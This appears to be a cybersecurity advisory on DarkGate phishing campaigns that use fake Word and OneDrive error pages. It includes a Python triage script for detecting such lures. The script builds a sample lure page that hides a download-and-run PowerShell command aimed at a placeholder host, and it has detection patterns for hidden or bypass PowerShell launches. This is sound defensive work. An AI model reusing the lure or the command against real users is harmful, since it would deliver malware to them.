NJCCIC: Phishing for DarkGate

DarkGate has been delivered through several phishing campaigns, including fake browser update lures, messages sent through Microsoft Teams, and PDFs containing Google DoubleClick Digital Marketing (DDM) open redirects. The NJCCIC recently reported on a DarkGate campaign exploiting a Windows SmartScreen vulnerability.
The NJCCIC's email security solution has recently observed multiple attempts to spread DarkGate malware through phishing campaigns. The emails were flagged because they came from newly registered domains and uncommon senders. While the wording varied, they mostly referred to charges or payments due and carried malicious HTML attachments. Once opened, the attachment renders a fake Microsoft Word document with an error message claiming that a root certificate must be installed, together with instructions for the "fix." Following those instructions launches a PowerShell script that installs DarkGate on the user's device.
A second observed DarkGate campaign used similar phishing emails with malicious HTML attachments; in this case, the opened attachment claimed the user could not connect to Microsoft OneDrive. After the user clicked the "How to Fix" button, the page either ran a PowerShell script that downloaded DarkGate automatically, or walked the user through opening PowerShell and running the "fix" themselves, which downloaded the malware. In both campaigns the attachment contains no exploit: the infection depends on PowerShell being launched, by the page or by the user, from inside an ordinary browser session.
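The two campaigns above share one shape: an HTML attachment that renders a fake Word or OneDrive error, offers a "fix," and ends with PowerShell running on the endpoint. The following is an added example, not NJCCIC or vendor tooling, of a triage script for that shape. It scores an HTML attachment against the lure indicators the advisory describes (fake Office error, root-certificate request, "How to Fix" button, clipboard copy, a hidden-window or execution-policy-bypass PowerShell command, including one hidden behind atob()), and separately flags process-creation events where PowerShell is started by a browser or by Explorer with those arguments. The sample attachment, the placeholder command (which points at a reserved .invalid domain), the simplified event records and the scoring thresholds are all constructed for the demo.

```python
"""Triage for the lure described above: an HTML attachment that renders a fake
Microsoft Word or OneDrive error and pushes the recipient to run a PowerShell
"fix". Added example, not NJCCIC or vendor tooling; the attachment, the
command and the process events below are constructed for the demo."""
import base64
import html
import re

# Indicators of the lure. Scoring thresholds are an assumption for this
# example, not a product setting.
LURE_PATTERNS = {
    "fake_office_error": re.compile(
        r"(microsoft word|onedrive).{0,120}(error|could not connect|unable)", re.I | re.S),
    "root_cert_request": re.compile(r"root\s+certificate", re.I),
    "fix_button": re.compile(r"how\s+to\s+fix", re.I),
    "clipboard_copy": re.compile(
        r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]", re.I),
    "powershell_launch": re.compile(
        r"powershell(\.exe)?\s+[^\"'<>]*?"
        r"(-ep\s+bypass|-executionpolicy\s+bypass|-w(indowstyle)?\s+hidden|"
        r"\biex\b|invoke-expression|downloadstring)", re.I),
}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def expand_base64(text: str) -> str:
    """Return the decoded form of every long base64 run that decodes to readable
    text, so a command hidden behind atob() is scanned like plain markup."""
    decoded_parts = []
    for m in B64_RUN.finditer(text):
        blob = m.group(0)
        try:
            decoded = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # binary data (e.g. an inline image), not a hidden string
        if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
            decoded_parts.append(decoded)
    return "\n".join(decoded_parts)


def triage_attachment(markup: str) -> dict:
    """Score an HTML attachment against the lure indicators."""
    text = html.unescape(markup)
    text = text + "\n" + expand_base64(text)
    hits = [name for name, pat in LURE_PATTERNS.items() if pat.search(text)]
    if "powershell_launch" in hits and len(hits) >= 3:
        verdict = "quarantine"
    elif len(hits) >= 2:
        verdict = "review"
    else:
        verdict = "clean"
    return {"hits": hits, "verdict": verdict}


# Behaviour-based endpoint check: PowerShell started by a browser (the page
# auto-launching it) or by Explorer (the user pasting the "fix") with
# hiding / bypass / download-and-run arguments on the command line.
LURE_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "explorer.exe"}


def suspicious_powershell(event: dict) -> bool:
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    return (image in {"powershell.exe", "pwsh.exe"}
            and parent in LURE_PARENTS
            and LURE_PATTERNS["powershell_launch"].search(event.get("CommandLine", "")) is not None)


# Constructed sample: the command is a placeholder pointing at a reserved
# .invalid domain, base64-encoded the way lure pages hide it from casual view.
FIX_CMD = 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/fix.ps1 | iex"'
SAMPLE_LURE = f"""<html><body>
<div class="doc"><h2>Microsoft Word</h2>
<p>Error: the document could not be displayed. A root certificate is missing.</p>
<button onclick="fix()">How to Fix</button></div>
<script>
function fix() {{
  navigator.clipboard.writeText(atob("{base64.b64encode(FIX_CMD.encode()).decode()}"));
  alert("Open PowerShell, paste the fix and press Enter.");
}}
</script></body></html>"""
SAMPLE_BENIGN = "<html><body><p>Invoice INV-1001 is attached. Thank you.</p></body></html>"

# Constructed process-creation events in a simplified key/value form (not a
# real Sysmon export).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": FIX_CMD},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    print(triage_attachment(SAMPLE_LURE))    # all five indicators, verdict "quarantine"
    print(triage_attachment(SAMPLE_BENIGN))  # no hits, verdict "clean"
    print([suspicious_powershell(e) for e in SAMPLE_EVENTS])  # [True, False]
```

The attachment scan is a gateway-side control and the process check an endpoint-side one; they are deliberately independent, since a campaign that bypasses the first (a new lure wording, a different encoding) still has to run PowerShell from a browser or Explorer with arguments an ordinary script launch rarely carries. Tune LURE_PARENTS and the "powershell_launch" pattern to your environment before relying on them: explorer.exe is the parent of every PowerShell a user opens from the Start menu, so the argument pattern does the real filtering there.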
Recommendations
Avoid clicking links and opening attachments in unsolicited emails, and treat unexpected HTML attachments in particular as suspect, since both campaigns described here rely on them. Confirm requests from senders via contact information obtained from verified and official sources. Type official website URLs into browsers manually. Include these phishing techniques in user awareness training, and make clear that no legitimate Microsoft error page asks the user to open PowerShell or install a root certificate to "fix" a document. Maintain robust and up-to-date endpoint detection tools on every endpoint. Prefer behavior-based detection over signature-only detection: the lure text, sending domains and hosting change from campaign to campaign, while the final step, PowerShell launched from a browser session or pasted in by the user, is consistent and can be alerted on. Phishing and other malicious cyber activity can be reported to the FBI's IC3 and the NJCCIC.